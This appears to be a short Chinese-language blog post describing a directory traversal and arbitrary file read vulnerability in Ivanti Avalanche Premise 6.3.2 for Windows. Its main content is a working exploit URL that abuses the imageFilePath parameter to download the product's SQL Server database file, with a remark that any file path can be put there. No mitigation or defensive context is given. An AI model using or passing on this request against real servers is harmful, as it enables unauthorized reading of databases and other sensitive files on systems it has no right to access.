Ivanti_Avalanche_目录遍歷&任意文件讀取漏洞

# Ivanti Avalanche 目录遍歷&任意文件讀取漏洞
==影響範圍==
Avalanche Premise 6.3.2 for Windows v6.3.2.3490

==漏洞利用==
訪問

https://IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/MSSQL/DATA/Avalanche.mdf

即可,imageFilePath=後面加文件的路徑。

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容